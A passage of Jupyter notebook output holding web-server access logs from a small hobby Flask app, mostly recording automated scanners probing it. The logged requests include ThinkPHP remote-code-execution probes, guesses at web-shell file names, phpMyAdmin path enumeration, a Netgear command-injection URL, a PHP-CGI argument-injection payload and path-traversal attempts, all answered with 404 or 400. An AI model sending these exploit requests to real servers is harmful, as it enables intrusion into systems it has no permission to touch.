      "186.17.190.232 - - [07/Sep/2019 18:38:48] \"GET /index.php?s=%2findex%2f%5cthink%5capp%2finvokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:38:49] \"GET /elrekt.php?s=%2findex%2f%5cthink%5capp%2finvokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:38:49] \"GET /App/?content=die(md5(HelloThinkPHP)) HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:38:53] \"GET /index.php?s=/module/action/param1/${@die(md5(HelloThinkPHP))} HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:38:54] \"GET /d7.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:38:55] \"GET /rxr.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:38:55] \"GET /1x.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:38:56] \"GET /home.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:38:57] \"GET /undx.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:38:58] \"GET /spider.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:38:59] \"GET /payload.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:39:01] \"GET /composers.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:39:01] \"GET /izom.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:39:02] \"GET /composer.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:39:03] \"GET /hue2.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:39:04] \"GET /Drupal.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:39:05] \"GET /lang.php?f=1 HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:39:05] \"GET /izom.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:39:10] \"GET /new_license.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:39:11] \"GET /images/!.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:39:12] \"GET /images/vuln.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:39:12] \"GET /hd.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:39:19] \"GET /images/attari.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:39:19] \"GET /images/jsspwneed.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:39:20] \"GET /images/stories/cmd.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:39:21] \"GET /images/stories/filemga.php?ssp=RfVbHu HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:39:22] \"GET /up.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:39:22] \"GET /laravel.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:39:33] \"GET /ftmabc.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:39:34] \"GET /doudou.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:39:35] \"GET /mjx.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:39:36] \"GET /xiaoxia.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:39:37] \"GET /yuyang.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:39:37] \"GET /zz.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:39:38] \"GET /coonig.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:39:39] \"GET /ak.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:39:40] \"GET /baidoubi.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:39:41] \"GET /hhhhhh.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:39:41] \"GET /meijianxue.php HTTP/1.1\" 404 -\n"
     ]
    },
    {
     "name": "stderr",
     "output_type": "stream",
     "text": [
      "186.17.190.232 - - [07/Sep/2019 18:39:42] \"GET /no1.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:39:46] \"GET /woshimengmei.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:39:47] \"GET /indea.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:39:48] \"GET /taisui.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:39:49] \"GET /xiaxia.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:39:50] \"GET /kk.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:39:50] \"GET /xsser.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:39:51] \"GET /zzz.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:39:52] \"GET /99.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:39:55] \"GET /phpdm.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:39:56] \"GET /root.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:39:57] \"GET /5678.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:39:58] \"GET /root11.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:40:02] \"POST /wuwu11.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:40:03] \"POST /xw.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:40:04] \"POST /xw1.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:40:04] \"POST /9678.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:40:05] \"POST /wc.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:40:06] \"POST /xx.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:40:07] \"POST /xx.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:40:08] \"POST /s.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:40:08] \"POST /w.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:40:13] \"POST /qaq.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:40:14] \"POST /my.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:40:15] \"POST /qq.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:40:19] \"POST /hhh.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:40:20] \"POST /jjj.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:40:21] \"POST /vvv.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:40:22] \"POST /www.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:40:24] \"POST /ffr.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:40:25] \"POST /411.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:40:30] \"POST /421.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:40:30] \"POST /444.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:40:31] \"POST /a411.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:40:36] \"POST /whoami.php.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:40:37] \"POST /9.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:40:37] \"POST /98k.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:40:38] \"POST /981.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:40:40] \"POST /887.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:40:41] \"POST /888.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:40:42] \"POST /aa.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:40:43] \"POST /bb.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:40:43] \"POST /pp.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:40:44] \"POST /tt.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:40:45] \"POST /bbq.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:40:46] \"POST /jj1.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:40:47] \"POST /jbb.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:40:47] \"POST /7o.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:40:54] \"POST /nb.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:40:54] \"POST /kpl.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:40:55] \"POST /hgx.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:40:56] \"POST /ppl.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:40:57] \"POST /tty.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:40:58] \"POST /ooi.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:40:58] \"POST /aap.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:40:59] \"POST /app.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:41:00] \"POST /bbr.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:41:01] \"POST /ioi.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:41:01] \"POST /uuu.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:41:02] \"POST /yyy.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:41:03] \"POST /ack.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:41:04] \"POST /shh.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:41:10] \"POST /nnn.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:41:10] \"POST /rrr.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:41:11] \"POST /ttt.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:41:16] \"POST /tyrant.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:41:17] \"POST /qiqi.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:41:17] \"POST /qiqi1.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:41:18] \"POST /zhk.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:41:19] \"POST /bbv.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:41:20] \"POST /605.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:41:20] \"POST /admin1.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:41:21] \"POST /xi.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:41:26] \"POST /jsc.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:41:26] \"POST /jsc.php.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:41:27] \"POST /jsc.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:41:28] \"POST /11a.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:41:29] \"POST /kkl.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:41:30] \"POST /ks1.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:41:30] \"POST /ooo.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:41:31] \"POST /wsx.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:41:32] \"POST /lz.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:41:33] \"POST /zmp.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:41:34] \"POST /803.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:41:39] \"POST /ze.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:41:39] \"POST /nnb.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:41:40] \"POST /lkio.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:41:41] \"POST /mm.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:41:45] \"GET /seeyon/htmlofficeservlet HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:41:49] \"GET /secure/ContactAdministrators!default.jspa HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:41:49] \"POST /index.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:41:50] \"POST /user/register?element_parents=timezone%2ftimezone%2f%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:41:51] \"GET / HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:41:52] \"POST /user.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:41:53] \"GET /index.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:41:53] \"GET /phpmyadmin/index.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:41:54] \"GET /phpMyAdmin/index.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:41:58] \"GET /pma/index.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:41:59] \"GET /PMA/index.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:42:00] \"GET /PMA2/index.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:42:00] \"GET /pmamy/index.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:42:01] \"GET /pmamy2/index.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:42:02] \"GET /mysql/index.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:42:03] \"GET /admin/index.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:42:03] \"GET /db/index.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:42:07] \"GET /web/phpMyAdmin/index.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:42:14] \"GET /admin/mysql/index.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:42:16] \"GET /admin/mysql2/index.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:42:17] \"GET /admin/phpmyadmin/index.php HTTP/1.1\" 404 -\n"
     ]
    },
    {
     "name": "stderr",
     "output_type": "stream",
     "text": [
      "186.17.190.232 - - [07/Sep/2019 18:42:18] \"GET /admin/phpMyAdmin/index.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:42:19] \"GET /admin/phpmyadmin2/index.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:42:20] \"GET /mysqladmin/index.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:42:20] \"GET /mysql-admin/index.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:42:24] \"GET /phpadmin/index.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:42:25] \"GET /phpAdmin/index.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:42:26] \"GET /phpmyadmin0/index.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:42:27] \"GET /phpmyadmin1/index.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:42:30] \"GET /phpMyAdmin-4.4.0/index.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:42:33] \"GET /myadmin/index.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:42:33] \"GET /myadmin2/index.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:42:40] \"GET /www/phpMyAdmin/index.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:42:41] \"GET /tools/phpMyAdmin/index.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:42:42] \"GET /phpmyadmin-old/index.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:42:43] \"GET /phpMyAdminold/index.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:42:46] \"GET /pma-old/index.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:42:47] \"GET /claroline/phpMyAdmin/index.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:42:51] \"GET /typo3/phpmyadmin/index.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:42:52] \"GET /phpma/index.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:42:53] \"GET /phpmyadmin/phpmyadmin/index.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:42:56] \"GET /phpMyAbmin/index.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:42:59] \"GET /phpMyAdmin__/index.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:43:03] \"GET /v/index.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:43:06] \"GET /phpmyadm1n/index.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:43:07] \"GET /phpMyAdm1n/index.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:43:08] \"GET /shaAdmin/index.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:43:08] \"GET /phpMyadmi/index.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:43:09] \"GET /phpMyAdmion/index.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:43:13] \"GET /MyAdmin/index.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:43:14] \"GET /phpMyAdmin1/index.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:43:15] \"GET /phpMyAdmin123/index.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:43:15] \"GET /pwd/index.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:43:19] \"GET /phpMydmin/index.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:43:20] \"GET /phpMyAdmins/index.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:43:21] \"GET /phpMyAdmin._/index.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:43:22] \"GET /phpMyAdmin._2/index.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:43:22] \"GET /phpmyadmin2222/index.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:43:23] \"GET /phpmyadmin3333/index.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:43:30] \"GET /phpNyAdmin/index.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:43:31] \"GET /1/index.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:43:32] \"GET /download/index.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:43:35] \"GET /phpmadmin/index.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:43:36] \"GET /321/index.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:43:37] \"GET /123131/index.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:43:38] \"GET /phpMyAdminn/index.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:43:39] \"GET /phpMyAdminhf/index.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:43:43] \"GET /WWW/phpMyAdmin/index.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:43:49] \"GET /shopdb/index.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:43:50] \"GET /phppma/index.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:43:51] \"GET /phpmy/index.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:43:52] \"GET /mysql/admin/index.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:43:54] \"GET /mysql/dbadmin/index.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:43:54] \"GET /mysql/sqlmanager/index.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:43:55] \"GET /mysql/mysqlmanager/index.php HTTP/1.1\" 404 -\n",
      "186.17.190.232 - - [07/Sep/2019 18:43:59] \"GET /manager/html HTTP/1.1\" 404 -\n",
      "103.205.144.244 - - [07/Sep/2019 18:46:37] \"GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox&curpath=/&currentsetting.htm=1 HTTP/1.1\" 404 -\n",
      "149.3.18.2 - - [07/Sep/2019 19:05:01] code 400, message Bad request version ('HTTP')\n",
      "149.3.18.2 - - [07/Sep/2019 19:05:01] \"GET ../../mnt/custom/ProductDefinition HTTP\" HTTPStatus.BAD_REQUEST -\n",
      "123.21.249.33 - - [07/Sep/2019 19:41:17] code 400, message Bad request version ('HTTP')\n",
      "123.21.249.33 - - [07/Sep/2019 19:41:17] \"GET ../../mnt/custom/ProductDefinition HTTP\" HTTPStatus.BAD_REQUEST -\n",
      "83.153.172.118 - - [07/Sep/2019 20:16:13] \"GET /shell?busybox HTTP/1.1\" 404 -\n",
      "139.162.119.197 - - [07/Sep/2019 20:25:11] \"GET / HTTP/1.1\" 404 -\n",
      "209.17.97.106 - - [07/Sep/2019 20:45:48] \"GET / HTTP/1.0\" 404 -\n",
      "176.98.219.30 - - [07/Sep/2019 20:49:04] \"GET / HTTP/1.1\" 404 -\n",
      "219.84.203.57 - - [07/Sep/2019 21:11:37] \"POST //%63%67%69%2D%62%69%6E/php?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-n HTTP/1.1\" 404 -\n",
      "138.68.208.55 - - [07/Sep/2019 22:34:45] \"GET /manager/text/list HTTP/1.1\" 404 -\n",
      "189.203.75.66 - - [07/Sep/2019 22:49:11] code 400, message Bad request version ('HTTP')\n",
      "189.203.75.66 - - [07/Sep/2019 22:49:11] \"GET ../../mnt/custom/ProductDefinition HTTP\" HTTPStatus.BAD_REQUEST -\n",
      "196.52.43.59 - - [07/Sep/2019 23:16:47] \"GET / HTTP/1.0\" 404 -\n",
      "187.188.192.188 - - [08/Sep/2019 00:00:30] code 400, message Bad request version ('HTTP')\n",
      "187.188.192.188 - - [08/Sep/2019 00:00:30] \"GET ../../mnt/custom/ProductDefinition HTTP\" HTTPStatus.BAD_REQUEST -\n",
      "187.188.163.47 - - [08/Sep/2019 01:09:38] code 400, message Bad request version ('HTTP')\n",
      "187.188.163.47 - - [08/Sep/2019 01:09:38] \"GET ../../mnt/custom/ProductDefinition HTTP\" HTTPStatus.BAD_REQUEST -\n",
      "138.68.208.128 - - [08/Sep/2019 01:32:39] \"GET /manager/html HTTP/1.1\" 404 -\n",
      "66.102.6.21 - - [08/Sep/2019 01:44:12] \"GET /favicon.ico HTTP/1.1\" 404 -\n",
      "103.209.205.75 - - [08/Sep/2019 02:05:55] \"GET / HTTP/1.1\" 404 -\n",
      "109.172.173.135 - - [08/Sep/2019 02:12:08] \"GET / HTTP/1.1\" 404 -\n",
      "81.174.38.165 - - [08/Sep/2019 02:12:15] code 400, message Bad request version ('HTTP')\n",
      "81.174.38.165 - - [08/Sep/2019 02:12:15] \"GET ../../mnt/custom/ProductDefinition HTTP\" HTTPStatus.BAD_REQUEST -\n",
      "14.186.220.139 - - [08/Sep/2019 02:52:35] code 400, message Bad request version ('HTTP')\n",
      "14.186.220.139 - - [08/Sep/2019 02:52:35] \"GET ../../mnt/custom/ProductDefinition HTTP\" HTTPStatus.BAD_REQUEST -\n",
      "14.186.220.139 - - [08/Sep/2019 03:34:52] code 400, message Bad request version ('HTTP')\n",
      "14.186.220.139 - - [08/Sep/2019 03:34:52] \"GET ../../mnt/custom/ProductDefinition HTTP\" HTTPStatus.BAD_REQUEST -\n",
      "123.21.109.170 - - [08/Sep/2019 04:04:46] code 400, message Bad request version ('HTTP')\n",
      "123.21.109.170 - - [08/Sep/2019 04:04:46] \"GET ../../mnt/custom/ProductDefinition HTTP\" HTTPStatus.BAD_REQUEST -\n",
      "188.166.124.214 - - [08/Sep/2019 04:08:01] \"GET / HTTP/1.1\" 404 -\n",
      "107.6.169.250 - - [08/Sep/2019 04:18:45] \"GET / HTTP/1.1\" 404 -\n",
      "172.28.0.3 - - [08/Sep/2019 04:41:53] \"GET /hello_post HTTP/1.1\" 200 -\n",
      "172.28.0.3 - - [08/Sep/2019 04:42:08] \"GET /hello_post HTTP/1.1\" 200 -\n",
      "172.28.0.3 - - [08/Sep/2019 04:42:09] \"GET /hello_post HTTP/1.1\" 200 -\n",
      "46.208.165.69 - - [08/Sep/2019 05:27:39] \"GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox&curpath=/&currentsetting.htm=1 HTTP/1.1\" 404 -\n"
     ]
    },
    {
     "name": "stderr",
     "output_type": "stream",
     "text": [
      "111.240.252.195 - - [08/Sep/2019 05:30:08] \"GET /weather HTTP/1.1\" 200 -\n"
     ]
    },
    {
     "name": "stdout",
     "output_type": "stream",
     "text": [
      "台南\n"
     ]
    },
    {
     "name": "stderr",
     "output_type": "stream",
     "text": [
      "111.240.252.195 - - [08/Sep/2019 05:30:21] \"POST /weather HTTP/1.1\" 200 -\n",
      "111.240.252.195 - - [08/Sep/2019 05:31:45] \"GET /homework HTTP/1.1\" 404 -\n",
      "42.116.43.237 - - [08/Sep/2019 05:33:32] code 400, message Bad request version ('HTTP')\n",
      "42.116.43.237 - - [08/Sep/2019 05:33:32] \"GET ../../mnt/custom/ProductDefinition HTTP\" HTTPStatus.BAD_REQUEST -\n",
      "172.28.0.3 - - [08/Sep/2019 05:59:38] \"POST /hello_post HTTP/1.1\" 200 -\n",
      "172.28.0.3 - - [08/Sep/2019 05:59:57] \"POST /hello_post HTTP/1.1\" 200 -\n",
      "189.203.177.24 - - [08/Sep/2019 06:07:07] code 400, message Bad request version ('HTTP')\n",
